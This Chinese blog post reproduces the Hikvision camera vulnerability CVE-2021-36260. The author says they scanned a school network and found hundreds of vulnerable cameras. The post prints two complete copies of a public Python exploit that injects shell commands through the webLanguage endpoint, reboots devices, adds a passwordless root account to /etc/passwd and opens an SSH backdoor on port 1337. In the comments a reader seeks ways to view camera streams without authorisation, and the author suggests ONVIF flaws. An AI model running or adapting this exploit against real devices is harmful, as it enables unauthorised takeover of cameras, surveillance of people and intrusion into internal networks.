-->
当前位置:首页 > DayDayUp > 正文内容

海康威视 CVE-2021-36260 漏洞复现

Luz2年前 (2021-11-28)DayDayUp25181

漏洞概述

海康威视摄像机最近的大多数摄像机产品系列都容易受到严重的远程未经身份验证的代码执行漏洞的影响。一些 NVR 也受到影响,尽管这种影响不那么普遍。


CVE-2021-36260漏洞允许攻击者通过不受限制的root shell (/bin/sh)获得对设备的完全控制,这比设备所有者拥有的访问权限要多得多,因为他们被限制在有限的“受保护的 shell”(/bin/psh)中,它将输入过滤到预定义的集合有限的,主要是信息性命令。


除了完全入侵 IP 摄像头之外,还可以访问和攻击内部网络。


这是最高级别的严重漏洞——一个影响大量海康威视摄像机的零点击未经身份验证的远程代码执行 (RCE) 漏洞。


只需要访问 http(s) 服务器端口(通常为 80/443)。不需要用户名或密码,也不需要由相机所有者发起任何操作。它不会被相机本身的任何日志检测到。


漏洞资产收集

基本上是个海康的摄像头可以,学校扫了一遍扫出来几百个。除了公安系统控制的摄像头以外,其他场所的摄像头往往并不注重于固件更新(如下图的摄像头仍然使用着2019年的固件)

image.png


POC

github上已经有许多公开的poc可以直接使用

Linux版本:

# Exploit Title: Hikvision Web Server Build 210702 - Command Injection
# Exploit Author: bashis
# Vendor Homepage: https://www.hikvision.com/
# Version: 1.0
# CVE: CVE-2021-36260
# Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html

# All credit to Watchful_IP

#!/usr/bin/env python3

"""
Note:
1)  This code will _not_ verify if remote is Hikvision device or not.
2)  Most of my interest in this code has been concentrated on how to
    reliably detect vulnerable and/or exploitable devices.
    Some devices are easy to detect, verify and exploit the vulnerability,
    other devices may be vulnerable but not so easy to verify and exploit.
    I think the combined verification code should have very high accuracy.
3)  'safe check' (--check) will try write and read for verification
    'unsafe check' (--reboot) will try reboot the device for verification

[Examples]
Safe vulnerability/verify check:
    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check

Safe and unsafe vulnerability/verify check:
(will only use 'unsafe check' if not verified with 'safe check')
    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot

Unsafe vulnerability/verify check:
    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot

Launch and connect to SSH shell:
    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell

Execute command:
    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"

Execute blind command:
    $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"

$./CVE-2021-36260.py -h
[*] Hikvision CVE-2021-36260
[*] PoC by bashis <mcw noemail eu> (2021)
usage: CVE-2021-36260.py [-h] --rhost RHOST [--rport RPORT] [--check]
                         [--reboot] [--shell] [--cmd CMD]
                         [--cmd_blind CMD_BLIND] [--noverify]
                         [--proto {http,https}]

optional arguments:
  -h, --help            show this help message and exit
  --rhost RHOST         Remote Target Address (IP/FQDN)
  --rport RPORT         Remote Target Port
  --check               Check if vulnerable
  --reboot              Reboot if vulnerable
  --shell               Launch SSH shell
  --cmd CMD             execute cmd (i.e: "ls -l")
  --cmd_blind CMD_BLIND
                        execute blind cmd (i.e: "reboot")
  --noverify            Do not verify if vulnerable
  --proto {http,https}  Protocol used
$
"""

import os
import argparse
import time

import requests
from requests import packages
from requests.packages import urllib3
from requests.packages.urllib3 import exceptions


class Http(object):
    def __init__(self, rhost, rport, proto, timeout=60):
        super(Http, self).__init__()

        self.rhost = rhost
        self.rport = rport
        self.proto = proto
        self.timeout = timeout

        self.remote = None
        self.uri = None

        """ Most devices will use self-signed certificates, suppress any warnings """
        requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

        self.remote = requests.Session()

        self._init_uri()

        self.remote.headers.update({
            'Host': f'{self.rhost}:{self.rport}',
            'Accept': '*/*',
            'X-Requested-With': 'XMLHttpRequest',
            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'en-US,en;q=0.9,sv;q=0.8',
        })
        """
        self.remote.proxies.update({
            # 'http': 'http://127.0.0.1:8080',
        })
        """

    def send(self, url=None, query_args=None, timeout=5):

        if query_args:
            """Some devices can handle more, others less, 22 bytes seems like a good compromise"""
            if len(query_args) > 22:
                print(f'[!] Error: Command "{query_args}" to long ({len(query_args)})')
                return None

        """This weird code will try automatically switch between http/https
        and update Host
        """
        try:
            if url and not query_args:
                return self.get(url, timeout)
            else:
                data = self.put('/SDK/webLanguage', query_args, timeout)
        except requests.exceptions.ConnectionError:
            self.proto = 'https' if self.proto == 'http' else 'https'
            self._init_uri()
            try:
                if url and not query_args:
                    return self.get(url, timeout)
                else:
                    data = self.put('/SDK/webLanguage', query_args, timeout)
            except requests.exceptions.ConnectionError:
                return None
        except requests.exceptions.RequestException:
            return None
        except KeyboardInterrupt:
            return None

        """302 when requesting http on https enabled device"""

        if data.status_code == 302:
            redirect = data.headers.get('Location')
            self.uri = redirect[:redirect.rfind('/')]
            self._update_host()
            if url and not query_args:
                return self.get(url, timeout)
            else:
                data = self.put('/SDK/webLanguage', query_args, timeout)

        return data

    def _update_host(self):
        if not self.remote.headers.get('Host') == self.uri[self.uri.rfind('://') + 3:]:
            self.remote.headers.update({
                'Host': self.uri[self.uri.rfind('://') + 3:],
            })

    def _init_uri(self):
        self.uri = '{proto}://{rhost}:{rport}'.format(proto=self.proto, rhost=self.rhost, rport=str(self.rport))

    def put(self, url, query_args, timeout):
        """Command injection in the <language> tag"""
        query_args = '<?xml version="1.0" encoding="UTF-8"?>' \
                     f'<language>$({query_args})</language>'
        return self.remote.put(self.uri + url, data=query_args, verify=False, allow_redirects=False, timeout=timeout)

    def get(self, url, timeout):
        return self.remote.get(self.uri + url, verify=False, allow_redirects=False, timeout=timeout)


def check(remote, args):
    """
    status_code == 200 (OK);
        Verified vulnerable and exploitable
    status_code == 500 (Internal Server Error);
        Device may be vulnerable, but most likely not
        The SDK webLanguage tag is there, but generate status_code 500 when language not found
        I.e. Exist: <language>en</language> (200), not exist: <language>EN</language> (500)
        (Issue: Could also be other directory than 'webLib', r/o FS etc...)
    status_code == 401 (Unauthorized);
        Defiantly not vulnerable
    """
    if args.noverify:
        print(f'[*] Not verifying remote "{args.rhost}:{args.rport}"')
        return True

    print(f'[*] Checking remote "{args.rhost}:{args.rport}"')

    data = remote.send(url='/', query_args=None)
    if data is None:
        print(f'[-] Cannot establish connection to "{args.rhost}:{args.rport}"')
        return None
    print('[i] ETag:', data.headers.get('ETag'))

    data = remote.send(query_args='>webLib/c')
    if data is None or data.status_code == 404:
        print(f'[-] "{args.rhost}:{args.rport}" do not looks like Hikvision')
        return False
    status_code = data.status_code

    data = remote.send(url='/c', query_args=None)
    if not data.status_code == 200:
        """We could not verify command injection"""
        if status_code == 500:
            print(f'[-] Could not verify if vulnerable (Code: {status_code})')
            if args.reboot:
                return check_reboot(remote, args)
        else:
            print(f'[+] Remote is not vulnerable (Code: {status_code})')
        return False

    print('[!] Remote is verified exploitable')
    return True


def check_reboot(remote, args):
    """
    We sending 'reboot', wait 2 sec, then checking with GET request.
    - if there is data returned, we can assume remote is not vulnerable.
    - If there is no connection or data returned, we can assume remote is vulnerable.
    """
    if args.check:
        print('[i] Checking if vulnerable with "reboot"')
    else:
        print(f'[*] Checking remote "{args.rhost}:{args.rport}" with "reboot"')
    remote.send(query_args='reboot')
    time.sleep(2)
    if not remote.send(url='/', query_args=None):
        print('[!] Remote is vulnerable')
        return True
    else:
        print('[+] Remote is not vulnerable')
        return False


def cmd(remote, args):
    if not check(remote, args):
        return False
    data = remote.send(query_args=f'{args.cmd}>webLib/x')
    if data is None:
        return False

    data = remote.send(url='/x', query_args=None)
    if data is None or not data.status_code == 200:
        print(f'[!] Error execute cmd "{args.cmd}"')
        return False
    print(data.text)
    return True


def cmd_blind(remote, args):
    """
    Blind command injection
    """
    if not check(remote, args):
        return False
    data = remote.send(query_args=f'{args.cmd_blind}')
    if data is None or not data.status_code == 500:
        print(f'[-] Error execute cmd "{args.cmd_blind}"')
        return False
    print(f'[i] Try execute blind cmd "{args.cmd_blind}"')
    return True


def shell(remote, args):
    if not check(remote, args):
        return False
    data = remote.send(url='/N', query_args=None)

    if data.status_code == 404:
        print(f'[i] Remote "{args.rhost}" not pwned, pwning now!')
        data = remote.send(query_args='echo -n P::0:0:W>N')
        if data.status_code == 401:
            print(data.headers)
            print(data.text)
            return False
        remote.send(query_args='echo :/:/bin/sh>>N')
        remote.send(query_args='cat N>>/etc/passwd')
        remote.send(query_args='dropbear -R -B -p 1337')
        remote.send(query_args='cat N>webLib/N')
    else:
        print(f'[i] Remote "{args.rhost}" already pwned')

    print(f'[*] Trying SSH to {args.rhost} on port 1337')
    os.system(f'stty echo; stty iexten; stty icanon; \
    ssh -o StrictHostKeyChecking=no -o LogLevel=error -o UserKnownHostsFile=/dev/null \
    P@{args.rhost} -p 1337')


def main():
    print('[*] Hikvision CVE-2021-36260\n[*] PoC by bashis <mcw noemail eu> (2021)')

    parser = argparse.ArgumentParser()
    parser.add_argument('--rhost', required=True, type=str, default=None, help='Remote Target Address (IP/FQDN)')
    parser.add_argument('--rport', required=False, type=int, default=80, help='Remote Target Port')
    parser.add_argument('--check', required=False, default=False, action='store_true', help='Check if vulnerable')
    parser.add_argument('--reboot', required=False, default=False, action='store_true', help='Reboot if vulnerable')
    parser.add_argument('--shell', required=False, default=False, action='store_true', help='Launch SSH shell')
    parser.add_argument('--cmd', required=False, type=str, default=None, help='execute cmd (i.e: "ls -l")')
    parser.add_argument('--cmd_blind', required=False, type=str, default=None, help='execute blind cmd (i.e: "reboot")')
    parser.add_argument(
        '--noverify', required=False, default=False, action='store_true', help='Do not verify if vulnerable'
    )
    parser.add_argument(
        '--proto', required=False, type=str, choices=['http', 'https'], default='http', help='Protocol used'
    )
    args = parser.parse_args()

    remote = Http(args.rhost, args.rport, args.proto)

    try:
        if args.shell:
            shell(remote, args)
        elif args.cmd:
            cmd(remote, args)
        elif args.cmd_blind:
            cmd_blind(remote, args)
        elif args.check:
            check(remote, args)
        elif args.reboot:
            check_reboot(remote, args)
        else:
            parser.parse_args(['-h'])
    except KeyboardInterrupt:
        return False


if __name__ == '__main__':
    main()


Win10版本:

import os
import argparse
import time
import requests
from requests import packages
from requests.packages import urllib3
from requests.packages.urllib3 import exceptions


class Http(object):
    def __init__(self, rhost, rport, proto, timeout=60):
        super(Http, self).__init__()

        self.rhost = rhost
        self.rport = rport
        self.proto = proto
        self.timeout = timeout

        self.remote = None
        self.uri = None

        requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

        self.remote = requests.Session()

        self._init_uri()

        self.remote.headers.update({
            'Host': f'{self.rhost}:{self.rport}',
            'Accept': '*/*',
            'X-Requested-With': 'XMLHttpRequest',
            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'en-US,en;q=0.9,sv;q=0.8',
        })

    def send(self, url=None, query_args=None, timeout=5):

        if query_args:
            if len(query_args) > 22:
                print(f'[!] Error: Command "{query_args}" to long ({len(query_args)})')
                return None

        try:
            if url and not query_args:
                return self.get(url, timeout)
            else:
                data = self.put('/SDK/webLanguage', query_args, timeout)
        except requests.exceptions.ConnectionError:
            self.proto = 'https' if self.proto == 'http' else 'https'
            self._init_uri()
            try:
                if url and not query_args:
                    return self.get(url, timeout)
                else:
                    data = self.put('/SDK/webLanguage', query_args, timeout)
            except requests.exceptions.ConnectionError:
                return None
        except requests.exceptions.RequestException:
            return None
        except KeyboardInterrupt:
            return None


        if data.status_code == 302:
            redirect = data.headers.get('Location')
            self.uri = redirect[:redirect.rfind('/')]
            self._update_host()
            if url and not query_args:
                return self.get(url, timeout)
            else:
                data = self.put('/SDK/webLanguage', query_args, timeout)

        return data

    def _update_host(self):
        if not self.remote.headers.get('Host') == self.uri[self.uri.rfind('://') + 3:]:
            self.remote.headers.update({
                'Host': self.uri[self.uri.rfind('://') + 3:],
            })

    def _init_uri(self):
        self.uri = '{proto}://{rhost}:{rport}'.format(proto=self.proto, rhost=self.rhost, rport=str(self.rport))

    def put(self, url, query_args, timeout):
        query_args = '<?xml version="1.0" encoding="UTF-8"?>' \
                     f'<language>$({query_args})</language>'
        return self.remote.put(self.uri + url, data=query_args, verify=False, allow_redirects=False, timeout=timeout)

    def get(self, url, timeout):
        return self.remote.get(self.uri + url, verify=False, allow_redirects=False, timeout=timeout)


def check(remote, args):

    if args.noverify:
        print(f'[*] Not verifying remote "{args.rhost}:{args.rport}"')
        return True

    print(f'[*] Checking remote "{args.rhost}:{args.rport}"')

    data = remote.send(url='/', query_args=None)
    if data is None:
        print(f'[-] Cannot establish connection to "{args.rhost}:{args.rport}"')
        return None
    print('[i] ETag:', data.headers.get('ETag'))

    data = remote.send(query_args='>webLib/c')
    if data is None or data.status_code == 404:
        print(f'[-] "{args.rhost}:{args.rport}" do not looks like Hikvision')
        return False
    status_code = data.status_code

    data = remote.send(url='/c', query_args=None)
    if not data.status_code == 200:

        if status_code == 500:
            print(f'[-] Could not verify if vulnerable (Code: {status_code})')
            if args.reboot:
                return check_reboot(remote, args)
        else:
            print(f'[+] Remote is not vulnerable (Code: {status_code})')
        return False

    print('[!] Remote is verified exploitable')
    return True


def check_reboot(remote, args):

    if args.check:
        print('[i] Checking if vulnerable with "reboot"')
    else:
        print(f'[*] Checking remote "{args.rhost}:{args.rport}" with "reboot"')
    remote.send(query_args='reboot')
    time.sleep(2)
    if not remote.send(url='/', query_args=None):
        print('[!] Remote is vulnerable')
        return True
    else:
        print('[+] Remote is not vulnerable')
        return False


def cmd(remote, args):
    if not check(remote, args):
        return False
    data = remote.send(query_args=f'{args.cmd}>webLib/x')
    if data is None:
        return False

    data = remote.send(url='/x', query_args=None)
    if data is None or not data.status_code == 200:
        print(f'[!] Error execute cmd "{args.cmd}"')
        return False
    print(data.text)
    return True


def cmd_blind(remote, args):
    if not check(remote, args):
        return False
    data = remote.send(query_args=f'{args.cmd_blind}')
    if data is None or not data.status_code == 500:
        print(f'[-] Error execute cmd "{args.cmd_blind}"')
        return False
    print(f'[i] Try execute blind cmd "{args.cmd_blind}"')
    return True


def shell(remote, args):
    if not check(remote, args):
        return False
    data = remote.send(url='/N', query_args=None)

    if data.status_code == 404:
        print(f'[i] Remote "{args.rhost}" not pwned, pwning now!')
        data = remote.send(query_args='echo -n P::0:0:W>N')
        if data.status_code == 401:
            print(data.headers)
            print(data.text)
            return False
        remote.send(query_args='echo :/:/bin/sh>>N')
        remote.send(query_args='cat N>>/etc/passwd')
        remote.send(query_args='dropbear -R -B -p 1337')
        remote.send(query_args='cat N>webLib/N')
    else:
        print(f'[i] Remote "{args.rhost}" already pwned')

    print(f'[*] Trying SSH to {args.rhost} on port 1337')
    os.system(f'ssh -o StrictHostKeyChecking=no -o LogLevel=error -o UserKnownHostsFile=/dev/null \
    P@{args.rhost} -p 1337')


def main():
    print('[*] Hikvision CVE-2021-36260\n[*] PoC by bashis <mcw noemail eu> (2021)')

    parser = argparse.ArgumentParser()
    parser.add_argument('--rhost', required=True, type=str, default=None, help='Remote Target Address (IP/FQDN)')
    parser.add_argument('--rport', required=False, type=int, default=80, help='Remote Target Port')
    parser.add_argument('--check', required=False, default=False, action='store_true', help='Check if vulnerable')
    parser.add_argument('--reboot', required=False, default=False, action='store_true', help='Reboot if vulnerable')
    parser.add_argument('--shell', required=False, default=False, action='store_true', help='Launch SSH shell')
    parser.add_argument('--cmd', required=False, type=str, default=None, help='execute cmd (i.e: "ls -l")')
    parser.add_argument('--cmd_blind', required=False, type=str, default=None, help='execute blind cmd (i.e: "reboot")')
    parser.add_argument(
        '--noverify', required=False, default=False, action='store_true', help='Do not verify if vulnerable'
    )
    parser.add_argument(
        '--proto', required=False, type=str, choices=['http', 'https'], default='http', help='Protocol used'
    )
    args = parser.parse_args()

    remote = Http(args.rhost, args.rport, args.proto)

    try:
        if args.shell:
            shell(remote, args)
        elif args.cmd:
            cmd(remote, args)
        elif args.cmd_blind:
            cmd_blind(remote, args)
        elif args.check:
            check(remote, args)
        elif args.reboot:
            check_reboot(remote, args)
        else:
            parser.parse_args(['-h'])
    except KeyboardInterrupt:
        return False


if __name__ == '__main__':
    main()

本poc获取shell时先向摄像机中添加一个P账户并赋予/bin/sh权限,最后开启1337端口作为ssh连接。

获取shell:

image.png

image.png


评论列表

zychina
zychina
2年前 (2022-05-12)

[+] Remote is not vulnerable (Code: 401)
这是啥情况?

Luz 回复:
漏洞被修复了吧
2年前 (2022-05-12)
zychina
zychina
2年前 (2022-05-13)

©2017 Hikvision Digital Technology Co., 重刷固件后,这里还是2017吗?

Luz 回复:
如果新固件只是在2017年的基线固件上做了漏洞修复,没有对功能做实质性修改或者优化,那么这里还是2017。即2017是基线固件的版本,并不能用作判断漏洞存在性的依据。
2年前 (2022-05-13)
zychina
zychina
2年前 (2022-05-13)

哦,谢谢,还有其他办法能光看流媒体吗?

Luz 回复:
试试onvif相关的漏洞
2年前 (2022-05-20)
zychina
zychina
2年前 (2022-05-24)

期盼给个教程

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。